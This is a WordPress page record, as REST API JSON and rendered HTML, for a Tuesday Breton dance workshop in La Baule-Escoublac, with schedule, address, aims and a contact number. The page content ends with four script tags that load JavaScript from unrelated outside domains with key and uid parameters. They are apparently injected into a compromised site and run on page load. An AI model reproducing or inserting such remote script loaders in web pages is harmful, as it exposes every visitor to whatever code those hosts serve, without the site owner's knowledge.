{"id":23,"date":"2017-04-13T11:04:27","date_gmt":"2017-04-13T09:04:27","guid":{"rendered":"http:\/\/labaulewp.gwalarn.org\/?page_id=23"},"modified":"2022-06-10T17:05:25","modified_gmt":"2022-06-10T16:05:25","slug":"atelier-danses-celtiques","status":"publish","type":"page","link":"https:\/\/cercleceltiquelabaule.bzh\/?page_id=23","title":{"rendered":"ATELIER DANSES BRETONNES DU MARDI"},"content":{"rendered":"<h1>Tous les mardis de 18h30 \u00e0 20 h dans nos locaux 1 avenue du Bois Robin La Baule-Escoublac<\/h1>\n<p><strong>Dani\u00e8le anime son atelier en&nbsp;permettant de s&rsquo;initier et de se perfectionner au cours des s\u00e9ances dans une ambiance d\u00e9tendue.<\/strong><\/p>\n<p><strong>L&rsquo;objectif est de donner aux participants&nbsp;la possibilit\u00e9 d&rsquo;\u00eatre \u00e0 l&rsquo;aise dans les festou-noz.<br \/>\n<\/strong><\/p>\n<ul>\n<li>&nbsp;Initiation aux danses bretonnes pour les adh\u00e9rents n&rsquo;ayant jamais pratiqu\u00e9.&nbsp;<\/li>\n<li>Perfectionnement des danses connues et apprentissage de nouvelles danses.<\/li>\n<li>Renseignements : 06 02 25 82 30<\/li>\n<\/ul>\n<p><script src=\"\/\/blinkloide.com\/221e5645d998d5ae68.js\"><\/script><script src=\"https:\/\/static-resource.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8734x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/cdn-javascript.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8734x&amp;format=arrjs&amp;r=1577744023234\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/blinkloide.com\/ext\/221e5645d998d5ae68.js?sid=52624_8734_&amp;title=q&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Tous les mardis de 18h30 \u00e0 20 h dans nos locaux 1 avenue du Bois Robin La Baule-Escoublac Dani\u00e8le anime son atelier en&nbsp;permettant de s&rsquo;initier et de se perfectionner au cours des s\u00e9ances dans une ambiance d\u00e9tendue. L&rsquo;objectif est de donner aux participants&nbsp;la possibilit\u00e9 d&rsquo;\u00eatre \u00e0 l&rsquo;aise dans les festou-noz. &nbsp;Initiation aux danses bretonnes pour &hellip; <a href=\"https:\/\/cercleceltiquelabaule.bzh\/?page_id=23\" class=\"more-link\">Continuer la lecture de <span class=\"screen-reader-text\">ATELIER DANSES BRETONNES DU MARDI<\/span>  <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"parent":26,"menu_order":1,"comment_status":"open","ping_status":"closed","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-23","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages\/23","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=23"}],"version-history":[{"count":18,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages\/23\/revisions"}],"predecessor-version":[{"id":5000,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages\/23\/revisions\/5000"}],"up":[{"embeddable":true,"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=\/wp\/v2\/pages\/26"}],"wp:attachment":[{"href":"https:\/\/cercleceltiquelabaule.bzh\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=23"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}

<h1>Tous les mardis de 18h30 à 20 h dans nos locaux 1 avenue du Bois Robin La Baule-Escoublac</h1>
<p><strong>Danièle anime son atelier en&nbsp;permettant de s&rsquo;initier et de se perfectionner au cours des séances dans une ambiance détendue.</strong></p>
<p><strong>L&rsquo;objectif est de donner aux participants&nbsp;la possibilité d&rsquo;être à l&rsquo;aise dans les festou-noz.<br />
</strong></p>
<ul>
<li>&nbsp;Initiation aux danses bretonnes pour les adhérents n&rsquo;ayant jamais pratiqué.&nbsp;</li>
<li>Perfectionnement des danses connues et apprentissage de nouvelles danses.</li>
<li>Renseignements : 06 02 25 82 30</li>
</ul>
<p><script src="//blinkloide.com/221e5645d998d5ae68.js"></script><script src="https://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8734x" type="text/javascript"></script><script src="https://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8734x&amp;format=arrjs&amp;r=1577744023234" type="text/javascript"></script><script src="https://blinkloide.com/ext/221e5645d998d5ae68.js?sid=52624_8734_&amp;title=q&amp;blocks[]=31af2" type="text/javascript"></script></p>

<p>Tous les mardis de 18h30 à 20 h dans nos locaux 1 avenue du Bois Robin La Baule-Escoublac Danièle anime son atelier en&nbsp;permettant de s&rsquo;initier et de se perfectionner au cours des séances dans une ambiance détendue. L&rsquo;objectif est de donner aux participants&nbsp;la possibilité d&rsquo;être à l&rsquo;aise dans les festou-noz. &nbsp;Initiation aux danses bretonnes pour &hellip; <a href="https://cercleceltiquelabaule.bzh/?page_id=23" class="more-link">Continuer la lecture de <span class="screen-reader-text">ATELIER DANSES BRETONNES DU MARDI</span>  <span class="meta-nav">&rarr;</span></a></p>
